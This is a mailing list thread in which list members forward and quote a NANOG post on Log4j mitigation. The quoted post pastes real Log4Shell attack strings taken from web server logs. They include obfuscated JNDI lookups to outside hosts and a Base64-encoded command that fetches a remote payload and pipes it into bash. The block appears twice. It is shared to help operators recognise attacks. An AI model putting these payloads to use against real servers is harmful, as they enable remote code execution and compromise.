[Bloat] Fwd: Log4j mitigation

[Bloat] Fwd: Log4j mitigation

[Dave Taht]

for those of you losing sleep over the java logging exploit, my heart
goes out to you.

While I'm glad I, personally, and on the bufferbloat related websites,
haven't got a single thing written in java, and I lost 3 weeks of my
life over christmas to spectre, and several weeks per year - and
usually, right around christmas! coping with other CVE's.... this one
seems so big and affecting so many other services I use, that I just
kind of want to take all my cash out of the bank, and log out, and
find a tropic island somewhere.

---------- Forwarded message ---------
From: Jörg Kost <jk@ip-clear.de>
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent <jean@ddostest.me>
Cc: <nanog@nanog.org>


You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL),
in Headers, in anything related to where a Java process does logging
with Log4j; it's innumerable. It might even evaluate from a URI itself;
it won't use a fixed port. It's not wormy right now, but maybe it will
soon.

We are seeing things like this since 10th of Dec. And this is only a
typical Apache Logfile for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
"${jndi:dns://45.83.64.1/securityscan-http80}"
"${jndi:dns://45.83.64.1/securityscan-http80}
GET
/?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
HTTP/1.1" 200 -
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}



-- 
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org

Dave Täht CEO, TekLibre, LLC

Re: [Bloat] Fwd: Log4j mitigation

[David Lang]

[-- Attachment #1: Type: text/plain, Size: 2616 bytes --]

Just a note that this doesn't require the code to be written in Java, any 
language that runs in a jvm can end up having grief.

David Lang

On Mon, 13 Dec 2021, Dave Taht wrote:

> Date: Mon, 13 Dec 2021 05:56:36 -0800
> From: Dave Taht <dave.taht@gmail.com>
> To: bloat <bloat@lists.bufferbloat.net>
> Subject: [Bloat] Fwd: Log4j mitigation
> 
> for those of you losing sleep over the java logging exploit, my heart
> goes out to you.
>
> While I'm glad I, personally, and on the bufferbloat related websites,
> haven't got a single thing written in java, and I lost 3 weeks of my
> life over christmas to spectre, and several weeks per year - and
> usually, right around christmas! coping with other CVE's.... this one
> seems so big and affecting so many other services I use, that I just
> kind of want to take all my cash out of the bank, and log out, and
> find a tropic island somewhere.
>
> ---------- Forwarded message ---------
> From: Jörg Kost <jk@ip-clear.de>
> Date: Mon, Dec 13, 2021 at 3:43 AM
> Subject: Re: Log4j mitigation
> To: Jean St-Laurent <jean@ddostest.me>
> Cc: <nanog@nanog.org>
>
>
> You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL),
> in Headers, in anything related to where a Java process does logging
> with Log4j; it's innumerable. It might even evaluate from a URI itself;
> it won't use a fixed port. It's not wormy right now, but maybe it will
> soon.
>
> We are seeing things like this since 10th of Dec. And this is only a
> typical Apache Logfile for HTTP/HTTPS, where we do logging:
>
> ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
> GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
> "${jndi:dns://45.83.64.1/securityscan-http80}"
> "${jndi:dns://45.83.64.1/securityscan-http80}
> GET
> /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
> HTTP/1.1" 200 -
> "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
> "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}
>
>
>
> -- 
> I tried to build a better future, a few times:
> https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org
>
> Dave Täht CEO, TekLibre, LLC
> _______________________________________________
> Bloat mailing list
> Bloat@lists.bufferbloat.net
> https://lists.bufferbloat.net/listinfo/bloat